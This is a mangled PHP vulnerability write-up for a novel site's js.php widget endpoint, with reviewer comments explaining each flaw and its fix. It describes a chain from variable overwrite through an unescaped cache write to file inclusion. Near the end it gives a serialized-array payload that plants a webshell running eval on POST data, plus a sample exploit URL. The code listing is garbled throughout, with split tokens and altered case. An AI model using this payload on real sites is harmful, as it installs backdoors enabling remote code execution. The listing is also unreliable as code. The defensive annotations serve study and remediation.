./js.php
// Request parsing for the JS widget endpoint: reads `argument` and `hash` from the query string,
// decodes `argument` into an array and rejects the request unless two checks pass.
// NOTE(review): this listing is a mangled copy (gutter numbers, split tokens, changed letter case);
// the comments describe only what the visible lines show.
$ Arguments = $ hash = '';
02 isset ($ _ GET ['argument']) & $ argument = $ _ GET ['argument'];
03 isset ($ _ GET ['hash']) & $ hash = $ _ GET ['hash'];
// Security: unserialize() is applied directly to request data. Untrusted input should be decoded
// with json_decode(), or at minimum unserialize($s, ['allowed_classes' => false]), and the result
// validated against a fixed list of expected keys and types.
04 $ arguments = unserialize (base64_decode ($ argument); // $ arguments parameters come from get (serialize in base64_encode ..)
// Dumps the decoded array into the response; looks like debug output, possibly added for the write-up - confirm.
05 print_r ($ arguments );
06 if (empty ($ arguments) |! Is_array ($ arguments ))
07 jsdie ('bad Request. Please check your argument .');
// The hash is compared with md5() of the same request parameter and involves no server-side secret,
// so any client can compute a matching value; it does not authenticate the argument.
// A keyed MAC (hash_hmac with a server secret) compared via hash_equals() would.
08 if (empty ($ hash) | $ hash! = Md5 ($ argument) // condition 1
09 jsdie ('bad Request. Please check your hash .');
10
// Copies every key of the request-derived $arguments array into a variable, then checks $limit.
// NOTE(review): the loop body is printed as `$ k = $ v`; presumably `$$k = $v` (variable variables)
// in the original file - confirm against the real source.
// Security: the keys are chosen by the request, so this loop can replace any variable already in scope,
// including values that were validated earlier in the script and configuration arrays used later.
// The $limit check after the loop ("condition 2") validates a value supplied through that same array.
// Safer pattern: read only an explicit allow-list of expected keys, cast and validate each one,
// and never let request keys shadow existing variables.
// The echo of the table-name constant looks like leftover debug output - confirm.
11 echo _ TAB_NOVEL __;
12 foreach ($ arguments as $ k => $ v) // overwrite the variable.
13 $ k = $ v;
14 echo "15
16 if (empty ($ limit) |! Ris_int ($ limit) // condition 2
17 jsdie ('bad Request. Please limit a number .');
18 omitted
19
// Maps $kind to a table constant and a WHERE fragment. The three named cases use fixed strings only.
// The default branch splits $subject on '_' and, when the split and the ris_int() test on $args[2]
// succeed, picks the table from $args[0] and appends $args[2] to the WHERE text.
// ris_int() is defined elsewhere; presumably an integer test - confirm.
// NOTE(review): the visible code never initialises $table or $where before the switch (some lines are
// marked "omitted"). If the default branch does not assign them, they keep whatever value they already
// had, and the key-to-variable loop earlier in the script means that value can come from the request.
// Initialising both immediately before the switch closes that gap.
20 switch ($ kind ){
21 case 'vip ':
22 $ table = _ TAB_NOVEL __;
23 $ where = 'vip = 1 ';
24 break;
25 case 'original ':
26 $ table = _ TAB_NOVEL __;
27 $ where = 'author _ id> 0 ';
28 break;
29 case 'copied ':
30 $ table = _ TAB_NOVEL __;
31 $ where = 'author _ id = 0 ';
32 break;
33 default:
34 $ args = explode ('_', $ subject );
35 if (count ($ args) = 3 & $ args [2] & ris_int ($ args [2]) {
36 $ table = $ args [0] = 'store '? _ TAB_STORY _: _ TAB_NOVEL __;
37 $ where = ($ args [1] = 'content '? 'Content': 'subobject'). '='. $ args [2];
38}
39 break;
40}
41
// Condition 3 only tests that $table is non-empty; it does not check that the value is one of the
// table constants used above.
42 if (! $ Table) // Condition 3
43 jsdie ('bad Request. Please choose a method .');
44
// Builds the cache file path from $hash and decides whether the cache must be regenerated
// (file missing, or older than $cachetime seconds relative to TIMESTAMP).
// Security: the cache file has a .php extension and is include'd later in the script, so whatever is
// written into it is executed as PHP. Storing the cache as non-executable data (for example a .js file
// sent with readfile()) and deriving the name server-side from validated parameters avoids that.
// NOTE(review): $hash and $cachetime are in scope when the key-to-variable loop runs, so they should be
// re-validated (fixed-length hex string, bounded integer) at this point.
45 $ jscachefile = ROOT. "data/cache/js _ $ hash. php"; // hash is obtained ..
46
47 $ update = false;
48 if (! File_exists ($ jscachefile) | (TIMESTAMP-filemtime ($ jscachefile) >=$ cachetime ))
49 $ update = true;
50
// Rebuilds the cache file: runs the list query, renders each row as document.writeln(...) JavaScript
// through addjs(), and writes $content to $jscachefile.
// addjs(), replace(), html_show(), convert(), rdate() and rfow() are defined elsewhere; presumably
// addjs() appends to $content - confirm.
51 if ($ update ){
// The file begins with a PHP guard line, so the cache is a PHP script rather than plain JavaScript.
52 $ content = "<? Php if (! Defined ('in _ read8') exit ('Access Denied ');?> \ N "; // The object must be included in the file to be viewed.
53
54 // $ SQL = "SELECT B. id, B. title, B. type_id, B. author, c. dateline, c. title as chapter_title, c. $ cid AS cid, v. name as volume_name FROM ". _ TAB_BOOK __. "B LEFT JOIN ". _ TAB_CHAPTER __. "c ON B. newchapterid = c. id left join ". _ TAB_VOLUME __. "v ON v. id = c. volume_id WHERE $ where order by B. updatetime desc limit $ limit ";
55 // $ result = $ db-> query ($ SQL );
// $table, $where and $limit are passed into the query description as text. They should be
// server-derived (table from a fixed set, $limit cast to int) by this point; $db->select() is not
// shown, so whether it escapes or parameterises anything is unknown.
56 $ wblock = $ db-> select (array (
57 'field' => 'id, title, author, subject, content, dateline, lastupdate ',
58 'from' => $ table,
59 'where' => 'where state IN (1, 2, 3) and'. $ where,
60 'order' => 'lastupdate desc ',
61 'limit' => $ limit,
62 'filter' => 'convert _ '. ($ table = _ TAB_NOVEL __? 'Noel': 'store'). '_ classes ',
63 ));
64
65 $ wblock = replace (html_show ($ wblock, false ));
66 if (! Empty ($ charset) & $ charset! = SYSCHARSET) $ wblock = convert ($ wblock, SYSCHARSET, $ charset );
67
68 addjs ('document. writeln ("<style type = \" text/css \ "/> ");');
69 addjs ('document. writeln (". update div. content {background: # F7F7F7; margin-top: 1px; width: 100%; padding: 5px 0 ;}");');
70 addjs ('document. writeln (". update div. left {float: left; margin-left: 3px; width: 70% ;}");');
71 addjs ('document. writeln (". update div. right {float: right; margin-right: 3px; width: 20% ;}");');
72 addjs ('document. writeln ("</style> ");');
73 addjs ('document. writeln ("<div class = \" update \ "> ");');
74
75 $ external = empty ($ openewindow )? '': ($ Openewindow = 'target '? 'Target = \ "_ blank \" ': ($ openewindow = 'rel ')? 'Rel = \ "external \"':''));
// Security: the row fields and the $_SYSTEM site-address entry are concatenated into the generated
// file without any output encoding. $_SYSTEM is expected to be trusted configuration, but the
// key-to-variable loop earlier in the script lets the request replace it, which is the point of the
// existing note on the table line below. Encode each value for its context (for example json_encode()
// for a JavaScript string) and keep request keys from shadowing configuration.
76 foreach ($ wblock as $ val ){
77 addjs ('document. writeln ("<table>"); '); // overwrite $ _ SYSTEM ['system'] ['site _ ADDR'] with variables. you can.
78 addjs ('document. writeln ("<tr> <td align = \" left \ "width = \" 70% \ "> & nbsp ;['. $ val ['subobject']. '] & nbsp; <a href = \"'. $ _ SYSTEM ['system'] ['site _ add']. '/'. ($ table = _ TAB_NOVEL __? 'Noel': 'store'). '. php? Bid = '. $ val ['id']. '\"'. $ external. 'style = \ "color: Green; \"> '. $ val ['title']. '</a> & nbsp; </td> ");');
79
80 addjs ('document. writeln ("<td align = \" right \ "width = \" 30% \ "> '. $ val ['autor']. '</a> & nbsp; & lt ;'. rdate ($ val ['lastupdate'],'m-d '). '& gt; </td> </tr> ");');
81 addjs ('document. writeln ("</table> ");');
82}
83 unset ($ wblock );
84
85 addjs ('document. writeln ("</div> ");');
86
87;
// Writes the generated text to the .php cache path that the script include's afterwards.
88 if (! Rfow ($ jscachefile, $ content) // The rfow function is the file put contents code.
89 jsdie ('can \'t write cache file. Please check your permission .');
90}
91
// Executes the cache file as PHP via include and aborts with jsdie() if that fails.
// Security: the cache content is assembled from values the request can influence, so this include is
// the step that turns the variable overwrite into code execution. Emitting the cache with readfile()
// (no PHP parsing) and keeping data/cache/ non-executable in the web server configuration removes it.
92 (! Include $ jscachefile) & jsdie ('can \'t read cache file. Please check your permission. '); // contains code that looks very similar to dede. Usage:
93
94
95 <? Php
// Sample input from the write-up: an array carrying 'limit', 'Kind' and a nested '_system' entry whose
// site-address value contains a PHP tag, so that the generated cache file would hold that tag.
// For defenders, the visible indicators are: requests to js.php with long base64 `argument` values that
// decode to serialized arrays whose keys match internal variable names; files under data/cache/ that
// contain PHP tags beyond the initial guard line; and new .php files appearing in the web root.
96 $ a = array ("limit" => '1', '_ system' => array ('system' => array ('site _ ADDR' => "<? Php file_put_contents ('./c. php',' <? Php eval (\ $ _ POST [s])?> ')?> "), 'Kind' => 'original ');
97 echo serialize ($ );
98?>
Generate the serialized array, base64-encode it, and then compute its MD5. URL: /js.php?argument=login/login&hash=ccfe8712c8669cf53b3a049f7872de86. This vulnerability is a chain: a variable overwrite, then a database query, then a file write, and finally inclusion of the written file. Tested locally.
The author is a dog man.